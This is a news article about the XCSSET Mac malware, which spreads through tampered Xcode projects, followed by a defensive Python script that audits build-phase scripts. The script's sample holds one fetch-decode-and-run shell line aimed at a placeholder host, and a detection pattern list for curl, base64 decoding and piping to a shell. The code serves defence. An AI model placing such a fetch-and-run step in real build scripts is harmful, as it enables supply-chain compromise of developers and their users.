Cybercriminals are infecting Mac applications at the source, contaminating benign open source projects with malware.
Running an infected application can send users to dangerous websites, swap the addresses of cryptocurrency wallets, take screenshots while they browse, and steal credit card details.
The malware also replaces Safari with a malicious version of Apple's browser, infects all other major browsers, steals usernames and passwords for Google, Apple ID, PayPal, Skype, Telegram, Evernote and WeChat, and can install ransomware.
To protect yourself, make sure you are running the best Mac antivirus software. Also, for the time being, only install apps from Apple's App Store.
Trend Micro, the antivirus maker that discovered the malware, called it a "rabbit hole of malicious payloads" in a blog post last week.
The malware, which Trend Micro calls XCSSET, profiles the system once it is fully installed and infects any version of the Brave, Firefox, Opera, 360 and Yandex browsers it finds. If Google Chrome is installed, the malware replaces it with an older version of Chrome with weaker security.
That is nothing compared to what it does to Safari. The malware downloads and installs a malicious copy of Safari and rewires the system so that anything that would normally launch the real Safari opens the fake one instead.
"Functionally, this means that a fake Safari browser runs instead of the legitimate version of Safari," states a Trend Micro white paper on the XCSSET malware.
So far, Trend Micro has confirmed that XCSSET has infected two Mac open source projects; infection of iOS apps has not been confirmed.
If this sounds familiar, something similar has happened before: in 2015, a malicious version of Apple's development platform Xcode was distributed in China. As a result, Mac and iOS apps created with the tainted Xcode were themselves infected. Apple promptly removed the tainted apps from its App Store.
So how is it happening again? This time the attackers are working one step further downstream: instead of tampering with Xcode itself, they are targeting projects hosted on online code repositories such as GitHub.
"Malicious code is injected into a local Xcode project, and when the project is built, the malicious code is executed," Trend Micro said.
Unwitting developers then release the applications signed with their own legitimate certificates, so infected applications are not always stopped by Apple's built-in security safeguards.
"Methods to verify distributed files (such as checking for hashes) are not helpful because developers are not aware that they are distributing malicious files," Trend Micro added.
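Because the injection lives in the Xcode project itself and runs when the project is built, one practical defence is to review a cloned project's build-phase scripts before the first build. The following Python is added here as an illustration and is not from Trend Micro's report; it assumes the injected code sits in a shell-script build phase (the standard way an Xcode project runs arbitrary commands during a build) and audits a constructed project.pbxproj fragment for script steps that download, decode or pipe code into a shell.

```python
import re

# Constructed sample of a project.pbxproj fragment: one benign shell-script build
# phase (a typical SwiftLint step) and one that fetches and runs code at build time.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		AA01 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			name = "Lint";
			shellPath = /bin/sh;
			shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
		};
		AA02 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			name = "Assets";
			shellPath = /bin/sh;
			shellScript = "curl -s https://example.invalid/p | base64 -d | sh\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

# Behaviours a reviewer should want explained before building a cloned project.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b"), "downloads content at build time"),
    (re.compile(r"base64\s+(-d|--decode|-D)\b"), "decodes an encoded payload"),
    (re.compile(r"\beval\b|\|\s*(ba)?sh\b"), "executes generated or piped code"),
]

BLOCK_RE = re.compile(r"=\s*\{(.*?)\n\s*\};", re.S)                 # one object { ... };
FIELD_RE = re.compile(r'(\w+) = (?:"((?:[^"\\]|\\.)*)"|([^;]+));')  # key = value;

def parse_shell_phases(pbxproj):
    """Yield (name, script) for every PBXShellScriptBuildPhase object."""
    for block in BLOCK_RE.finditer(pbxproj):
        fields = {k: (q or u) for k, q, u in FIELD_RE.findall(block.group(1))}
        if fields.get("isa") != "PBXShellScriptBuildPhase":
            continue
        # pbxproj strings escape newlines and quotes; undo that before matching.
        script = fields.get("shellScript", "").replace("\\n", "\n").replace('\\"', '"')
        yield fields.get("name", "(unnamed)"), script

def audit(pbxproj):
    """Return [(phase_name, [reasons])] for phases matching any suspicious pattern."""
    findings = []
    for name, script in parse_shell_phases(pbxproj):
        reasons = [why for rx, why in SUSPICIOUS if rx.search(script)]
        if reasons:
            findings.append((name, reasons))
    return findings
```

On the sample, audit(SAMPLE_PBXPROJ) reports only the "Assets" phase, with all three reasons, while the lint step passes cleanly.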